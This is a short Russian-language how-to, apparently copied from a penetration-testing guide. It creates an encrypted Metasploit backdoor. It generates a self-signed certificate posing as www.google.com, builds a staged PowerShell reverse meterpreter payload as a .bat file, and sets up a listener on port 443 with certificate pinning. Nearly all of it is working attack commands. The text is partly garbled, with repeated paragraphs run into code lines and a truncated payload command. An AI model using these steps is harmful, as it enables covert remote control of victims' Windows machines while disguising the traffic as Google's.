OpenSSL создает сертификат SSL/TLS:
Создать бэкдор:
При настройке прослушивателя требуются две дополнительные опции. Это делается для того, чтобы сообщить обработчику сертификата, который он будет использовать (такой же, как полезная нагрузка), и выполнить проверку сертификата SSL при получении соединения.
Ref
Код:
openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \
-subj "/C=UK/ST=London/L=London/O=Development/CN=www.google.com" \
-keyout www.google.com.key \
-out www.google.com.crt && \
cat www.google.com.key www.google.com.crt > www.google.com.pem && \
rm -f www.google.com.key www.google.com.crtСоздать бэкдор:
Код:
LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=www.google.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f psh-cmd -o pentestlab.batПри настройке прослушивателя требуются две дополнительные опции. Это делается для того, чтобы сообщить обработчику сертификата, который он будет использовать (такой же, как полезная нагрузка), и выполнить проверку сертификата SSL при получении соединения.
Код:
HandlerSSLCert
StagerVerifySSLCert
set payload windows/meterpreter/reverse_winhttps
set LHOST 192.168.0.149
set LPORT 443
set HandlerSSLCert /home/kali/msf/www.google.com.pem
set StagerVerifySSLCert true
exploitRef